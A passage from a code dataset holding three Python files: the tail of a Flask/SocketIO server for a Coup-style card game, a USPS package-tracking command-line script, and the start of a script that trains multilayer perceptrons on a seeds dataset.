room[\"game_data\"][\"action_log\"].append(params)\n\n # Modify cards and coins with turn actions that cant be undone\n players = room[\"game_data\"][\"players\"]\n for item in players:\n if action.startswith(\"assassinate\") and item[\"user_name\"] == user_name:\n item[\"coins\"] -= 3\n\n # Backup the game state (for potential blocks)\n if action != \"allow\" and action != \"challenge\" and not action.startswith(\"reveal\") and not action.startswith('discard') and not action.startswith('doublediscard'):\n # action and challenge dont change game state and shouldnt blow away valuable saved backup\n # harmless for income to do a backup\n # required for foreign aid to do a backup\n # required for a block to do a backup\n temp_backup = copy.deepcopy(room[\"game_data\"][\"prev_players\"])\n room[\"game_data\"][\"prev_players\"] = copy.deepcopy(room[\"game_data\"][\"players\"])\n\n # Modify cards and coins with the turn actions\n players = room[\"game_data\"][\"players\"]\n for item in players:\n if action == \"income\" and item[\"user_name\"] == user_name:\n item[\"coins\"] += 1\n elif action == \"foreign_aid\" and item[\"user_name\"] == user_name:\n item[\"coins\"] += 2\n elif action == \"tax\" and item[\"user_name\"] == user_name:\n item[\"coins\"] += 3\n elif action == \"exchange\" and item[\"user_name\"] == user_name:\n room[\"game_data\"][\"pre_exchange_cards\"] = copy.deepcopy(item[\"cards\"])\n deck = room[\"game_data\"][\"deck\"]\n if len(deck) > 0:\n random.shuffle(deck)\n item[\"cards\"].append(deck.pop())\n if len(deck) > 0:\n random.shuffle(deck)\n item[\"cards\"].append(deck.pop())\n elif action.startswith('doublediscard') and item[\"user_name\"] == user_name:\n tmp = action.replace(\"doublediscard\", \"\")\n idxes = sorted(list(int(i) for i in tmp.split(\"_\")))\n # do sorting then back to front for indexing issues\n room[\"game_data\"][\"deck\"].append(item[\"cards\"].pop(idxes[1]))\n room[\"game_data\"][\"deck\"].append(item[\"cards\"].pop(idxes[0]))\n elif action.startswith('infect') and item[\"user_name\"] == user_name:\n item[\"coins\"] -= 7\n elif action.startswith('discard') and item[\"user_name\"] == user_name:\n discard_index = int(action.replace(\"discard\", \"\"))\n for player in room[\"game_data\"][\"players\"]:\n if player[\"user_name\"] == user_name:\n card = player[\"cards\"].pop(discard_index)\n room[\"game_data\"][\"grave_yard\"].append(card)\n break\n for item in players:\n if action.replace(\"steal\", \"\") == item[\"user_name\"]:\n stolen = min(2, item[\"coins\"])\n item[\"coins\"] -= stolen\n for item in players:\n if action.startswith(\"steal\") and item[\"user_name\"] == user_name:\n item[\"coins\"] += stolen\n\n if action == \"block\":\n room[\"game_data\"][\"players\"] = temp_backup\n elif action.startswith(\"reveal\"):\n # check legitimacy\n reveal_index = int(action.replace(\"reveal\", \"\"))\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"tax\", \"exchange\", \"block\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\"):\n challenged_action = item[\"action\"]\n break\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"foreign_aid\", \"exchange\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\"):\n preblock_action = item[\"action\"]\n break\n for item in room[\"game_data\"][\"players\"]:\n if user_name == item[\"user_name\"]:\n revealed_card = item[\"cards\"].pop(reveal_index)\n break\n if challenged_action == 'exchange':\n revealed_card = room[\"game_data\"][\"pre_exchange_cards\"][reveal_index]\n claim_prooved = False\n if challenged_action == 'block':\n if preblock_action == 'foreign_aid':\n if revealed_card == 'Duke':\n claim_prooved = True\n elif preblock_action.startswith('steal'):\n if revealed_card == 'Captain' or revealed_card == \"Ambassador\":\n claim_prooved = True\n elif preblock_action.startswith('assassinate'):\n if revealed_card == 'Contessa':\n claim_prooved = True\n elif challenged_action == 'tax':\n if revealed_card == 'Duke':\n claim_prooved = True\n elif challenged_action.startswith('steal'):\n if revealed_card == 'Captain':\n claim_prooved = True\n elif challenged_action.startswith('assassinate'):\n if revealed_card == \"Assassin\":\n claim_prooved = True\n elif challenged_action == 'exchange':\n if revealed_card == 'Ambassador':\n claim_prooved = True\n if claim_prooved:\n # player that just did the reveal gets their card sent to the deck and they get a new one\n room[\"game_data\"][\"deck\"].append(revealed_card)\n random.shuffle(room[\"game_data\"][\"deck\"])\n for item in room[\"game_data\"][\"players\"]:\n if user_name == item[\"user_name\"]:\n if len(room[\"game_data\"][\"deck\"]) > 0:\n item[\"cards\"].append(room[\"game_data\"][\"deck\"].pop())\n # the challenger must be punished\n print('claim prooved - punish the challenger at the end of this function')\n else:\n # Restore game state to before the saved (challenged) action\n room[\"game_data\"][\"players\"] = copy.deepcopy(room[\"game_data\"][\"prev_players\"])\n # Punish the challenged player by graveyarding the card they just revealed\n for item in room[\"game_data\"][\"players\"]:\n if user_name == item[\"user_name\"]:\n # gotta redo the pop here because the deepcopy above will undo it\n revealed_card = item[\"cards\"].pop(reveal_index)\n break\n room[\"game_data\"][\"grave_yard\"].append(revealed_card)\n\n # Add next actions game can wait for\n if action == 'income':\n next_player = RC.get_next_player_name(room[\"game_data\"], user_name)\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n elif action == 'foreign_aid':\n if room[\"game_params\"][\"approval_timer\"] == \"disabled\":\n next_player = RC.get_next_player_name(room[\"game_data\"], user_name)\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] != user_name:\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='block', user_name=item[\"user_name\"]))\n elif action == \"tax\" or action.startswith(\"steal\"):\n if room[\"game_params\"][\"approval_timer\"] == \"disabled\":\n next_player = RC.get_next_player_name(room[\"game_data\"], user_name)\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n for item in room[\"game_data\"][\"players\"]:\n if action.startswith('steal') and item[\"user_name\"] == action.replace('steal', ''):\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='block', user_name=item[\"user_name\"]))\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] != user_name:\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='challenge', user_name=item[\"user_name\"]))\n elif action == \"allow\" and len(room[\"game_data\"][\"waiting_for\"]) == 0:\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"income\", \"foreign_aid\", \"tax\", \"exchange\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\") or item[\"action\"].startswith(\"infect\"):\n next_player = RC.get_next_player_name(room[\"game_data\"], item[\"user_name\"])\n break\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n elif action.startswith('assassinate'):\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='discard', user_name=action.replace(\"assassinate\", \"\")))\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] != user_name:\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='block', user_name=item[\"user_name\"]))\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] != user_name:\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='challenge', user_name=item[\"user_name\"]))\n elif action == \"exchange\":\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='doublediscard', user_name=user_name))\n elif action.startswith(\"doublediscard\"):\n if room[\"game_params\"][\"approval_timer\"] == \"disabled\":\n next_player = RC.get_next_player_name(room[\"game_data\"], user_name)\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] != user_name:\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='challenge', user_name=item[\"user_name\"]))\n elif action.startswith('infect'):\n victim = action.replace('infect', '')\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='discard', user_name=victim))\n elif action == \"block\":\n if room[\"game_params\"][\"approval_timer\"] == \"disabled\":\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"income\", \"foreign_aid\", \"tax\", \"exchange\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\") or item[\"action\"].startswith(\"infect\"):\n next_player = RC.get_next_player_name(room[\"game_data\"], item[\"user_name\"])\n break\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] != user_name:\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='challenge', user_name=item[\"user_name\"]))\n elif action == \"challenge\":\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"income\", \"foreign_aid\", \"tax\", \"exchange\", \"block\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\") or item[\"action\"].startswith(\"infect\"):\n challenged_user = item[\"user_name\"]\n break\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='reveal', user_name=challenged_user))\n elif action.startswith(\"reveal\"):\n if claim_prooved:\n # next action must be challenger penalized\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] == \"challenge\":\n challenger = item[\"user_name\"]\n break\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='discard', user_name=challenger))\n else:\n # Challenge is over - the pretender was caught lets move the game along to the next turn\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"income\", \"foreign_aid\", \"tax\", \"exchange\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\") or item[\"action\"].startswith(\"infect\"):\n next_player = RC.get_next_player_name(room[\"game_data\"], item[\"user_name\"])\n break\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n elif action.startswith(\"discard\"):\n # Challenge is over - the false accuser was punished lets move the game along\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"income\", \"foreign_aid\", \"tax\", \"exchange\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\") or item[\"action\"].startswith(\"infect\"):\n next_player = RC.get_next_player_name(room[\"game_data\"], item[\"user_name\"])\n break\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n\n\n return room[\"game_data\"]\n\n@socketio.on('load play page')\ndef load_play_page(json):\n print('rx msg ' + str(json))\n join_room(json['room_name']) # this is a socketio function that i happen to have a name collision with\n emit('update', get_game_state(json[\"user_name\"], json[\"room_name\"], to_jsonify=False))\n\n@socketio.on('play action')\ndef play_action(json):\n print('rx msg ' + str(json))\n rooms = mydb[\"room\"]\n rc = RC(rooms)\n\n print(json[\"action\"])\n if \"action\" in json and json[\"action\"] == \"reset_game\" and \"room_name\" in json:\n rc.modify_room(json[\"room_name\"], 'waiting')\n rc.modify_room(json[\"room_name\"], 'started')\n\n\n if \"room_name\" in json and \"user_name\" in json and \"action\" in json:\n truth = rc.modify_room(json[\"room_name\"], 'play_action', params=dict(user_name=json[\"user_name\"], action=json[\"action\"]))\n print (truth)\n game_state = get_game_state(json[\"user_name\"], json[\"room_name\"], to_jsonify=False)\n game_state['success'] = truth\n emit('update', game_state, room=json[\"room_name\"])\n\n\n@app.route('/get_game_state//')\ndef get_game_state(user_name, room_name, to_jsonify=True):\n myclient = pymongo.MongoClient(app.config[\"MONGOSTRING\"])\n mydb = myclient[\"dev_db\"]\n rooms = mydb[\"room\"]\n room = rooms.find_one({\"room_name\": room_name})\n game_data = room[\"game_data\"]\n game_data[\"game_master\"] = room[\"game_master\"]\n #for item in game_data[\"players\"]: # commend this out for now, we'd prefer to have cards totally hidden from web clients but i want the game to work first\n # if item[\"user_name\"] != user_name:\n # for i, card in enumerate(item[\"cards\"]):\n # item[\"cards\"][i] = \"hidden\"\n for i, item in enumerate(game_data[\"deck\"]):\n game_data[\"deck\"][i] = \"hidden\"\n if room[\"game_params\"][\"keep_grave_sorted\"]:\n game_data[\"grave_yard\"] = sorted(game_data[\"grave_yard\"])\n del game_data[\"prev_players\"]\n if to_jsonify:\n return jsonify(room[\"game_data\"])\n else:\n return room[\"game_data\"]\n\n@app.route('/mongo_play_page//')\ndef mongo_play_page(user_name, room_name):\n game_data = get_game_state(user_name, room_name, to_jsonify=False)\n kwargs = dict(user_name=user_name,\n room_name=room_name,\n game_master=game_data[\"game_master\"],\n players=game_data[\"players\"],\n activity_log=game_data[\"action_log\"],\n waiting_for = game_data[\"waiting_for\"],\n deck_size = len(game_data[\"deck\"]),\n grave_yard = game_data[\"grave_yard\"],\n alternate_js=True)\n return render_template('mongo_play_page.html', **kwargs)\n\n@app.route('/')\ndef hello():\n return render_template('landing_page.html')\n #return redirect(url_for('join_page'))\n\n@app.route('/action///')\ndef action(user_name, action_string, room_name):\n is_ajax = False\n with open(db_prefix+'state.json', \"r\") as statef:\n state = json.load(statef)\n room = state.get('rooms', dict(room_name=None)).get(room_name, None)\n if room is None:\n return \"Room Not Found\" # TODO\n game_data = room.get(\"game_data\", dict())\n room[\"game_data\"] = game_data\n game_data['activity_log'] = game_data.get('activity_log', [])\n act_split = action_string.split('_')\n print(act_split)\n if act_split[0] == \"increase\":\n for item in game_data.get('players', []):\n if item.get('user_name', '') == act_split[1]:\n item['n_coins'] += 1\n if act_split[0] == \"decrease\":\n for item in game_data.get('players'):\n if item.get('user_name', '') == act_split[1]:\n print('dec steve')\n item['n_coins'] -= 1\n if act_split[0] == \"reveal\":\n for player in game_data.get('players', []):\n if player['user_name'] == user_name:\n for card in player.get('cards', []):\n if str(card['id']) == act_split[1]:\n card['hidden'] = False\n if act_split[0] == \"hide\":\n for player in game_data.get('players', []):\n if player['user_name'] == user_name:\n for card in player.get('cards', []):\n if str(card['id']) == act_split[1]:\n card['hidden'] = True\n if act_split[0] == \"grave\":\n for player in game_data.get('players', []):\n if player['user_name'] == user_name:\n hand = []\n for card in player.get('cards', []):\n if str(card['id']) == act_split[1]:\n game_data['graveyard'].append(card)\n else:\n hand.append(card)\n player['cards'] = hand\n if act_split[0] == \"deck\":\n for player in game_data.get('players', []):\n if player['user_name'] == user_name:\n hand = []\n for card in player.get('cards', []):\n if str(card['id']) == act_split[1]:\n game_data['deck'].append(card)\n else:\n hand.append(card)\n player['cards'] = hand\n if act_split[0] == 'claim':\n # idx = random.randint(0,len(state['deck']))\n # card = state['deck'].pop(idx)\n if len(game_data['deck']) > 0:\n random.shuffle(game_data['deck'])\n card = game_data['deck'].pop()\n card['hidden'] = True\n for player in game_data.get('players', []):\n if player['user_name'] == user_name:\n player['cards'].append(card)\n if act_split[0] == 'reset':\n #with open(db_prefix+'state_base.json', \"r\") as statef:\n # state = json.load(statef)\n #for item in range(int(act_split[1])):\n # game_data['players'].append(dict(user_name = \"player\" + str(item+1), n_coins = 2, cards = []))\n room[\"game_data\"] = room[\"game_init\"]\n room[\"game_init\"] = copy.deepcopy(room[\"game_init\"])\n if act_split[0] == 'takeincome':\n is_ajax = True\n game_data = room[\"game_data\"]\n for player in game_data.get(\"players\", []):\n if player.get('user_name', '') == user_name:\n player['n_coins'] += 1\n game_data['turn'] += 1\n if game_data['turn'] >= len(game_data[\"players\"]):\n game_data['turn'] = 0\n if act_split[0] == 'takeforeignaid':\n is_ajax = True\n game_data = room[\"game_data\"]\n for player in game_data.get(\"players\", []):\n if player.get('user_name', '') == user_name:\n game_data['turn'] += 1\n if game_data['turn'] >= len(game_data[\"players\"]):\n game_data['turn'] = 0\n game_data['block_state'] = dict()\n game_data['block_state'] = copy.deepcopy(game_data)\n player['n_coins'] += 2\n if act_split[0] == 'block':\n is_ajax = True\n if request.values['desired_block'] == game_data[\"activity_log\"][-1]:\n activity_log = copy.deepcopy(game_data[\"activity_log\"])\n bs = copy.deepcopy(game_data)\n game_data = copy.deepcopy(game_data['block_state'])\n game_data[\"activity_log\"] = activity_log\n game_data[\"block_state\"] = bs\n def is_duke(player_name):\n for item in game_data[\"players\"]:\n if item[\"user_name\"] == player_name:\n for card in item[\"cards\"]:\n if card[\"name\"] == \"Duke\":\n return True\n return False\n if (\"foreignaid\" in game_data[\"activity_log\"][0] and is_duke(user_name)):\n game_data[\"claim_legit\"] = True\n game_data[\"claim_maker\"] = user_name\n else:\n game_data[\"claim_legit\"] = False\n game_data[\"claim_maker\"] = user_name\n room[\"game_data\"] = game_data\n if act_split[0] == 'challenge':\n is_ajax = True\n if request.values['desired_challenge'] == game_data[\"activity_log\"][-1]:\n if game_data[\"claim_legit\"] == False:\n claim_maker = game_data[\"claim_maker\"]\n activity_log = copy.deepcopy(game_data[\"activity_log\"])\n game_data = copy.deepcopy(game_data['block_state'])\n game_data[\"activity_log\"] = activity_log\n game_data[\"penalize\"] = claim_maker\n room[\"game_data\"] = game_data\n else:\n game_data[\"penalize\"] = user_name\n if act_split[0] == \"discard\":\n is_ajax = True\n for player in game_data.get('players', []):\n if player['user_name'] == user_name:\n hand = []\n for i, card in enumerate(player.get('cards', [])):\n if str(i) == act_split[1]:\n game_data['graveyard'].append(card)\n else:\n hand.append(card)\n player['cards'] = hand\n game_data[\"penalize\"] = ''\n\n\n\n\n game_data['activity_log'].append(f\"{user_name} did {action_string}\")\n with open(db_prefix+'state.json', \"w\") as statef:\n json.dump(state, statef)\n if is_ajax:\n # TODO sanitize state so we arent sending private hand info and deck info out to all players\n return jsonify(dict(game_data=game_data))\n else:\n return redirect(url_for('play_page', user_name=user_name, room_name=room_name))\n\n@app.route('/play_page//')\ndef play_page(user_name, room_name):\n n_coins = 0\n players = []\n with open(db_prefix+'state.json') as statef:\n state = json.load(statef)\n game_data = state.get('rooms', dict()).get(room_name, dict()).get('game_data', dict())\n players = game_data.get('players', [])\n graveyard = game_data.get('graveyard', [])\n deck = game_data.get('deck', [])\n deck_size = len(deck)\n activity_log = game_data.get('activity_log', [])\n return render_template(\"play_page.html\", players=players, graveyard=graveyard, deck_size = deck_size, user_name=user_name, activity_log=activity_log, room_name=room_name)\n\n@app.route('/play_page2//')\ndef play_page2(user_name, room_name):\n n_coins = 0\n players = []\n with open(db_prefix+'state.json') as statef:\n state = json.load(statef)\n game_data = state.get('rooms', dict()).get(room_name, dict()).get('game_data', dict())\n turn = game_data.get('turn')\n players = game_data.get('players', [])\n whose_turn = ''\n for i, item in enumerate(players):\n if i == turn:\n whose_turn = item.get('user_name', '')\n graveyard = game_data.get('graveyard', [])\n deck = game_data.get('deck', [])\n deck_size = len(deck)\n penalize = game_data.get('penalize', '')\n activity_log = game_data.get('activity_log', [])\n return render_template(\"play_page2.html\", players=players, graveyard=graveyard, deck_size = deck_size, user_name=user_name, activity_log=activity_log, room_name=room_name, turn=turn, whose_turn=whose_turn, penalize=penalize)\n\n@app.route('/join_page')\ndef join_page():\n with open(db_prefix+'state.json', \"r\") as statef:\n state = json.load(statef)\n public_rooms = []\n rooms = state.get('rooms', [])\n for item in rooms:\n print(rooms[item].get('is_private'))\n if len(rooms[item].get('is_private', \"on\")) == 0:\n public_rooms.append(item)\n return render_template(\"join_page.html\", public_rooms=public_rooms)\n@app.route('/create_page')\ndef create_page():\n game_names = [\"Spanish Flu\"]\n return render_template(\"create_page.html\", game_names=game_names)\n@app.route('/create', methods=[\"GET\", \"POST\"])\ndef create():\n user_name = escape(request.form.get('user_name', ''))\n user_name = user_name.replace(' ', '')\n if len(user_name) == 0:\n # TODO improve - prevent collisions with db checking\n user_name = 'player'+str(uuid.uuid4().hex)[0:8]\n room_name = escape(request.form.get('room_name', ''))\n room_name = room_name.replace(' ', '')\n if len(room_name) == 0:\n # TODO improve - prevent collisions with db checking\n room_name = 'room'+str(uuid.uuid4().hex)[0:8]\n is_private = escape(request.form.get('is_private', ''))\n game_name = escape(request.form.get('game_name', ''))\n #if game_name == \"Spanish Flu\":\n # with open(db_prefix+'state_base.json', \"r\") as statef:\n # game_data = json.load(statef)\n # game_init = copy.deepcopy(game_data)\n # players=game_data.get('players', [])\n # players.append(dict(user_name = user_name, n_coins = 2, cards = []))\n # game_data['players'] = players\n # if len(game_data['deck']) > 0:\n # random.shuffle(game_data['deck'])\n # card = game_data['deck'].pop()\n # card['hidden'] = True\n # for player in game_data.get('players', []):\n # if player['user_name'] == user_name:\n # player['cards'].append(card)\n # if len(game_data['deck']) > 0:\n # random.shuffle(game_data['deck'])\n # card = game_data['deck'].pop()\n # card['hidden'] = True\n # for player in game_data.get('players', []):\n # if player['user_name'] == user_name:\n # player['cards'].append(card)\n #else:\n # game_data = dict()\n #if \"turn\" not in game_data:\n # game_data[\"turn\"] = 0\n #room = dict(room_name = room_name,\n # game_master = user_name,\n # is_private = is_private,\n # game_name = game_name,\n # game_data = game_data,\n # game_init = game_init)\n #with open(db_prefix+'state.json', \"r\") as statef:\n # state = json.load(statef)\n #rooms = state.get('rooms', dict())\n #rooms[room_name] = room # Note duplicate rooms get clobbered fix that TODO\n #state['rooms'] = rooms\n #with open(db_prefix+'state.json', \"w\") as statef:\n # json.dump(state, statef)\n rooms = mydb[\"room\"]\n rc = RC(rooms)\n room = rc.create_room(room_name, user_name, is_private, game_name)\n rc.modify_room(room_name, 'waiting')\n rc.modify_room(room_name, 'started')\n print(room)\n return redirect(url_for('mongo_play_page', user_name=user_name, room_name=room_name))\n@app.route('/join', methods=[\"GET\", \"POST\"])\ndef join():\n user_name = str(escape(request.values['user_name']))\n user_name = user_name.replace(' ', '')\n if len(user_name) == 0:\n # TODO improve - prevent collisions with db checking\n user_name = 'player'+str(uuid.uuid4().hex)[0:8]\n if 'private_join' in request.values:\n room_name = str(escape(request.values['private_room_name']))\n elif 'public_join' in request.values:\n room_name = str(escape(request.values['public_room_name']))\n else:\n room_name = str(escape(request.values['room_name']))\n\n rooms = mydb[\"room\"]\n rc = RC(rooms)\n room = rc.join_room(room_name, user_name)\n print(room)\n\n #with open(db_prefix+'state.json', \"r\") as statef:\n # state = json.load(statef)\n #room = state.get('rooms', dict(room_name=None)).get(room_name, None)\n if room == False:\n return \"Room Not Found\" # TODO\n #game_data = room.get(\"game_data\", dict())\n #players = game_data.get('players', [])\n #def user_exists():\n # for item in game_data.get('players', []):\n # if item['user_name'] == user_name:\n # return True\n # return False\n\n #print('join')\n #if not user_exists():\n # print('join')\n # players.append(dict(user_name = user_name, n_coins = 2, cards = []))\n # game_data['players'] = players\n # if len(game_data['deck']) > 0:\n # random.shuffle(game_data['deck'])\n # card = game_data['deck'].pop()\n # card['hidden'] = True\n # for player in game_data.get('players', []):\n # if player['user_name'] == user_name:\n # player['cards'].append(card)\n # if len(game_data['deck']) > 0:\n # random.shuffle(game_data['deck'])\n # card = game_data['deck'].pop()\n # card['hidden'] = True\n # for player in game_data.get('players', []):\n # if player['user_name'] == user_name:\n # player['cards'].append(card)\n #if \"turn\" not in game_data:\n # game_data[\"turn\"] = 0\n #with open(db_prefix+'state.json', \"w\") as statef:\n # print('c')\n # json.dump(state, statef)\n return redirect(url_for('mongo_play_page', user_name=user_name, room_name=room_name))\n\ndef main():\n global db_prefix\n db_prefix = ''\n # app.run(host='0.0.0.0', debug=True)\n socketio.run(app)\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":45588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"419514982","text":"#!/usr/bin/env python3\n# USPS API Tracking\n# Tested on Python 3.4.2 running on Debian 8.7\n# https://github.com/LiterallyLarry/USPS-Tracking-Python\n#\n# You must provide your API key in config.json as 'api_key' before running this program! You can sign up for an API key here: https://www.usps.com/business/web-tools-apis/welcome.htm\n\nfrom urllib import request, parse\nfrom sys import argv\nfrom xml.etree import ElementTree\nimport argparse, json, sys, os\n\nUSPS_API_URL = \"http://production.shippingapis.com/ShippingAPI.dll?API=TrackV2\";\n\npath = os.path.dirname(os.path.realpath(__file__))\n\nwith open(os.path.join(path, \"config.json\")) as config_file:\n config = json.load(config_file);\n api_key = config.get(\"api_key\");\n\nif not api_key:\n sys.exit(\"Error: Could not find USPS API key in config.json!\");\n\nparser = argparse.ArgumentParser(description='Tracks USPS numbers via Python.');\n\nparser.add_argument('tracking_numbers', metavar='TRACKING_NUMBER', type=str, nargs='*',\n help='a tracking number');\nparser.add_argument('-s', action='store_true', default=False,\n dest='show_tracking_number',\n help='Show tracking number in output');\nparser.add_argument('-n', action='store_false', default=True,\n dest='show_tracking_extended',\n help='Hide extended tracking information');\nparser.add_argument('-m', action='store_true', default=False,\n dest='show_minimal',\n help='Repress UI');\n\ndef usps_track(numbers_list):\n xml = \"\" % api_key;\n for track_id in numbers_list:\n xml += \"\" % track_id;\n xml += \"\";\n target = \"%s&%s\" % (USPS_API_URL, parse.urlencode({ \"XML\" : xml }));\n request_obj = request.urlopen(target);\n result = request_obj.read();\n request_obj.close();\n return result;\n\nif __name__ == \"__main__\":\n args = parser.parse_args();\n if args.tracking_numbers: # Arguments support multiple tracking numbers\n track_ids = args.tracking_numbers;\n #track_ids = argv[1:];\n else:\n #track_id = input(); # User input supports only a single number\n track_id = input('Enter tracking numbers separated by spaces: '); # User input supports multiple tracking numbers split with spaces\n if len(track_id) < 1:\n exit(0);\n track_ids = track_id.split(' ');\n #track_ids = [ track_id ];\n real = []\n for id in track_ids:\n if id[0] != '#':\n real.append(id);\n track_ids = real\n track_xml = usps_track(track_ids);\n# print(track_xml);\n track_result = ElementTree.ElementTree(ElementTree.fromstring(track_xml));\n if not args.show_minimal:\n print('OK!');\n for result in track_result.findall('Description'):\n print(result.text);\n# for result in track_result.findall('.//TrackSummary'):\n# print(result.text);\n for number, result in enumerate(track_result.findall('.//TrackInfo')):\n if args.show_tracking_number:\n track_num = ' (%s)' % track_ids[number];\n else:\n track_num = ''\n summary = result.find('TrackSummary');\n if summary is None:\n print('Error in XML!');\n print(track_xml);\n else:\n if args.show_minimal:\n print('%s' % summary.text);\n else:\n print('\\nPackage #%d%s:\\n %s' % (number+1,track_num,summary.text));\n if args.show_tracking_extended:\n details = result.findall('TrackDetail');\n for number_2, detailed_result in enumerate(details):\n if number_2+1 == len(details):\n print(' └ %s' % detailed_result.text);\n else:\n print(' ├ %s' % detailed_result.text);\n","sub_path":"tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"254436721","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom MLP import MLP\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import precision_score\nimport matplotlib.pyplot as plt\nimport itertools\nfrom datetime import datetime\n\n\nif __name__ == '__main__':\n # Read csv file\n data = pd.read_csv(os.path.join('..', 'seeds.txt'))\n\n outpath = os.path.join('plots', 'seeds')\n\n orig_columns = data.columns\n\n # Normalize Columns and add polynomial features\n for col in orig_columns[:-1]:\n data[col] = (data[col] - data[col].min()) / (data[col].max()-data[col].min())\n data = data.join(data[col].pow(2), rsuffix='2')\n data = data.join(data[col].pow(3), rsuffix='3')\n\n # Shuffle and sampling dataset keeping class proportion\n train_df = pd.DataFrame(columns=data.columns)\n test_df = pd.DataFrame(columns=data.columns)\n validation_df = pd.DataFrame(columns=data.columns)\n\n grouped = data.groupby('class')\n\n np.random.seed(28021992)\n\n for name, group in grouped:\n idx_list = list(group.index)\n np.random.shuffle(idx_list)\n group = group.loc[idx_list]\n\n train_size = int(np.round(len(group) * 0.6))\n test_size = int(np.round(len(group) * 0.2))\n\n train_df = train_df.append(group[:train_size])\n test_df = test_df.append(group[train_size:train_size+test_size])\n validation_df = validation_df.append(group[train_size+test_size:])\n\n y_train = train_df[['class']].copy()\n y_test = test_df[['class']].copy()\n y_validation = validation_df[['class']].copy()\n\n # Convert pandas.DataFrame into numpy.matrix\n x_train = np.asmatrix(train_df.drop('class', axis=1).values)\n x_test = np.asmatrix(test_df.drop('class', axis=1).values)\n x_validation = np.asmatrix(validation_df.drop('class', axis=1).values)\n\n if not os.path.exists(outpath):\n os.makedirs(outpath)\n\n n_list = [0.3, 0.1, 0.03, 0.01, 0.003]\n\n best_mlp = None\n best_precision = 0.0\n best_n = None\n best_topology = None\n\n for i in range(1, 4):\n for hidden in itertools.product([i for i in range(3, 7)], repeat=i):\n hidden = list(hidden)\n best_topology_mlp = None\n best_topology_precision = 0.0\n best_topology_n = None\n\n for n in n_list:\n print('[' + datetime.now().__str__() + '] training MLP {} witn n={}'.format(hidden, n))\n\n for it in range(5):\n print('[' + datetime.now().__str__() + '] iteration {}'.format(it))\n # Train perceptron\n mlp = MLP(x_train, y_train['class'], hidden=hidden, n=n)\n\n # Classify dataset using the trained perceptron\n p_y = mlp.predict(x_test)\n\n actual_precision = precision_score(\n y_test.values.astype(int),\n p_y.values.astype(int),\n average='micro'\n )\n\n if actual_precision > best_topology_precision:\n best_topology_precision = actual_precision\n best_topology_mlp = mlp\n best_topology_n = n\n\n if best_topology_precision > best_precision:\n best_precision = best_topology_precision\n best_n = best_topology_n\n best_mlp = best_topology_mlp\n best_topology = hidden.copy()\n\n # Print confusion matrix\n p_y = best_topology_mlp.predict(x_test)\n conf_m = confusion_matrix(y_test.values.astype(int), p_y.values.astype(int))\n print('##### Seeds Experiment - Layers {}\\n'.format(hidden))\n # print('Weights:')\n # print(best_topology_mlp.w)\n # print()\n print('Best n:')\n print(best_topology_n)\n print('Confusion Matrix:')\n print(conf_m)\n print('Precision:')\n print(best_topology_precision)\n\n # Plot Error Graph to check learning rate\n plt.plot([i for i in range(len(best_topology_mlp.erro_var))], best_topology_mlp.erro_var)\n plt.grid(True, linestyle=':')\n plt.savefig(os.path.join(outpath, '{}.png'.format(hidden)))\n plt.close()\n\n # Best MLP validation\n p_y = best_mlp.predict(x_validation)\n conf_m = confusion_matrix(y_validation.values.astype(int), p_y.values.astype(int))\n print('##### Seeds Experiment - Best Topology {}\\n'.format(best_topology))\n # print('Weights:')\n # 